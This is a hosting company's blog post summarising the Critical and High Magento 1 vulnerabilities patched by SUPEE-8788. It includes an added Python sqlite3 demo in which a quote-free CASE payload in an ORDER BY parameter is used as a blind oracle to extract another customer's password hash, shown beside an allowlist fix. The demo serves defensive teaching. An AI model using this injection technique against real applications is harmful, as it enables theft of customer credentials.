Multiple High Risk Vulnerabilities in all Magento 1 Websites


Magento has announced seventeen security vulnerabilities, many of them rated Critical or High, which should be fixed as soon as possible by applying patch SUPEE-8788. Upgrading to Community Edition 1.9.3 or Enterprise Edition 1.14.3, both of which include the same fixes, is the alternative. Once the patch script has run, confirm that SUPEE-8788 is recorded in app/etc/applied.patches.list in the Magento root before assuming the site is protected.

Full details of all vulnerabilities can be seen here; those rated Critical or High are listed below.

APPSEC-1484 – Remote Code Execution in checkout

Rated at 9.8 (Critical) – With some payment methods it might be possible to execute malicious PHP code during checkout.

APPSEC-1480 – SQL injection in Zend Framework

Rated at 9.1 (Critical) – A bug in Zend Framework value escaping allows a malicious user to inject SQL through the ordering or grouping parameters. While there are no known frontend entry point vulnerabilities that would allow for a full SQL injection, we’ve found an entry point in the Magento Admin panel, and other entry points most likely exist.
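The general class of problem behind APPSEC-1480 is worth seeing in code. ORDER BY and GROUP BY take identifiers, not values, so they cannot be passed as bound parameters, and escaping them as though they were string values does not make them safe. The snippet below is an added example, not code from Magento, Zend Framework or this post, and it does not reproduce the specific Zend escaping bug: it uses Python and sqlite3 with a constructed two-row customer table to show a sort parameter that is quote-escaped but still lets an attacker read another row's password hash one character at a time through the row ordering, beside the hardened version that only accepts allowlisted column names.

```python
import sqlite3

# Constructed demo table; the schema and rows are not Magento's.
ALICE, BOB = "alice@example.com", "bob@example.com"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customer (id INTEGER, email TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO customer VALUES (?, ?, ?)",
        [(1, ALICE, "hash-a"), (2, BOB, "hash-b")],
    )
    return conn


def naive_escape(identifier):
    # Treats the sort column like a string value: doubling quotes is all it does.
    return identifier.replace("'", "''")


def list_emails_unsafe(conn, order_by):
    """Vulnerable: the sort column is 'escaped' as a value and concatenated."""
    sql = "SELECT email FROM customer ORDER BY " + naive_escape(order_by)
    return [row[0] for row in conn.execute(sql)]


# Hardened form: identifiers are checked against an allowlist, never escaped.
ALLOWED_SORT_COLUMNS = {"id", "email"}


def list_emails_safe(conn, order_by):
    """Only allowlisted column names reach the query; anything else is rejected."""
    if order_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {order_by!r}")
    sql = f"SELECT email FROM customer ORDER BY {order_by}"
    return [row[0] for row in conn.execute(sql)]


def hash_char_is(conn, position, codepoint):
    """Blind oracle through the unsafe sort: the CASE expression sorts by id when
    the guessed character of customer 1's password_hash is right and by -id when
    it is wrong, so the returned row order answers the question. The payload
    contains no quote characters, so naive_escape() does nothing to it."""
    payload = (
        f"(CASE WHEN (SELECT unicode(substr(password_hash,{int(position)},1)) "
        f"FROM customer WHERE id=1)={int(codepoint)} THEN id ELSE -id END)"
    )
    return list_emails_unsafe(conn, payload) == [ALICE, BOB]


def recover_hash(conn, max_len=32):
    """Rebuilds customer 1's password_hash character by character using the oracle;
    stops at the first position where no printable character matches."""
    recovered = ""
    for position in range(1, max_len + 1):
        for codepoint in range(32, 127):
            if hash_char_is(conn, position, codepoint):
                recovered += chr(codepoint)
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY:", recover_hash(db))
    print("safe sort by email:", list_emails_safe(db, "email"))
    try:
        list_emails_safe(db, "(CASE WHEN 1=1 THEN id ELSE -id END)")
    except ValueError as exc:
        print("rejected:", exc)
```

The point the advisory makes about entry points applies here too: the attacker never needs a quote or a comment sequence, only control of the sort expression, so any admin or frontend parameter that ends up in ORDER BY or GROUP BY is a candidate, and the only reliable defence is mapping user input onto a fixed set of column names.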

APPSEC-1488 – Stored XSS in invitations

Rated at 8.2 (High) – It is possible to use the Magento Enterprise Edition invitations feature to insert malicious JavaScript that might be executed in the admin context.

APPSEC-1247 – Block cache exploit

Rated at 7.7 (High) – With access to any CMS functionality, an attacker with administrator permissions can use blocks to exfiltrate information stored in cache. This sensitive information includes store configuration, encryption key, and database connection details. Additionally, it might be possible to execute code.

APPSEC-1517 – Log in as another customer

Rated at 7.5 (High) – In certain configurations, it is possible to log in as an existing store customer knowing only their email address, not their password.

This is the main Havenswift Hosting company account that is used by different members of staff when making blog postings on behalf of the company rather than as individuals

Copyright Havenswift Hosting 2007-2018. All rights reserved.